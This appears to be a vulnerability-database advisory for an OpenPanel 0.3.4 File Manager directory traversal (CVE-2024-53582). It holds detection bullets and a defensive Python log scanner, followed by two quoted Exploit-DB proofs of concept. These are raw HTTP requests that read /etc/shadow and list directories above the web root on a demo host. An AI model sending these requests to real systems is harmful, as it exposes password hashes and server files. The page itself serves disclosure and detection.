CVE-2024-53582
Published: 2025-01-31
Priority: P3 · 57 · high · CVSS 3.1 base score 7.5
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploit: public exploit available (see the Exploit-DB entries below)
EPSS: 3.15% (86.3rd percentile)
An issue found in the Copy and View functions in the File Manager component of OpenPanel v0.3.4 allows attackers to execute a directory traversal via a crafted HTTP request.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openpanel | openpanel | — | — |
Detection & IOCs (extracted from sources)
- Detect directory traversal attempts targeting the OpenPanel File Manager via the /view_file endpoint with path_param values containing absolute paths outside the web root (e.g., /etc).
- Detect path traversal sequences (/../) in requests to the /files/ endpoint on OpenPanel port 2083, indicative of directory traversal exploitation.
- Monitor for requests to /view_file with filename=shadow, which indicates an attempt to read /etc/shadow via the directory traversal vulnerability.
- Flag HTTP requests to OpenPanel (port 2083) that include the X-Requested-With: XMLHttpRequest header combined with path traversal sequences in the URL path.
- Requests originating with Referer: https://demo.openpanel.org:2083/files/ combined with traversal patterns in the request path are characteristic of this exploit chain.
- The exploit was tested against OpenPanel v0.3.4 specifically; other versions may or may not be vulnerable. Scope detection rules accordingly.
- The exploit was demonstrated against a live demo host (demo.openpanel.org:2083); production deployments may use different hostnames or ports, so detection should not be host-specific.
- Two separate exploit vectors exist for CVE-2024-53582: the View function (/view_file endpoint) and the Copy function, as well as an Incorrect Access Control path traversal via /files/. Detection rules should cover both attack surfaces.
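As an added example (not from the page's sources or from OpenPanel), the detection bullets above turned into a small access-log scanner: it parses combined-format log lines, decodes the request target once so encoded traversal (%2e%2e) is caught, and flags the /view_file and /files/ patterns. The sample log lines, the client IPs and the rule names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Nov/2024:10:00:01 +0000] "GET /view_file?filename=shadow&path_param=/etc HTTP/2.0" 200 1204 "https://demo.openpanel.org:2083/file" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2024:10:00:02 +0000] "GET /files/../.. HTTP/2.0" 200 3311 "https://demo.openpanel.org:2083/files/" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2024:10:00:03 +0000] "GET /files/%2e%2e/%2e%2e HTTP/2.0" 200 3311 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Nov/2024:10:00:04 +0000] "GET /view_file?filename=index.html&path_param=public_html HTTP/2.0" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Nov/2024:10:00:05 +0000] "GET /files/public_html/logs HTTP/2.0" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target: str) -> list[str]:
    """Return the names of the detection rules a single request target trips."""
    parts = urlsplit(target)
    path = unquote(parts.path)  # decode %2e%2e so encoded traversal is caught too
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}  # parse_qs already decodes
    hits = []
    if path == "/view_file":
        path_param = query.get("path_param", "")
        # Rule 1: an absolute path or a traversal segment in path_param leaves the user's web root.
        if path_param.startswith("/") or ".." in path_param.split("/"):
            hits.append("view_file_path_param_outside_root")
        # Rule 3: the public PoC reads /etc/shadow via filename=shadow.
        if query.get("filename") == "shadow":
            hits.append("view_file_shadow_read")
    # Rule 2: traversal segment on the /files/ listing endpoint.
    if path.startswith("/files/") and ".." in path.split("/"):
        hits.append("files_listing_traversal")
    return hits


def scan_log(text: str) -> list[dict]:
    """Run every line through the rules; return one finding per matching request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        rules = classify_request(m["target"])
        if rules:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                             "status": m["status"], "rules": rules})
    return findings
```

Feeding the constructed log through `scan_log` yields three findings, all from the first client, and none for the two legitimate requests under the user's own public_html.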
No detection rules found.
Exploit-DB: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
exploitdb · 2025-04-14 · CVSS 7.5 · CVE-2024-53582 [HIGH]
---
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/file
Exploit-DB: OpenPanel 0.3.4 - Incorrect Access Control
exploitdb · 2025-04-14 · CVSS 7.5 · CVE-2024-53582 [HIGH]
---
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
No writeups or analysis indexed.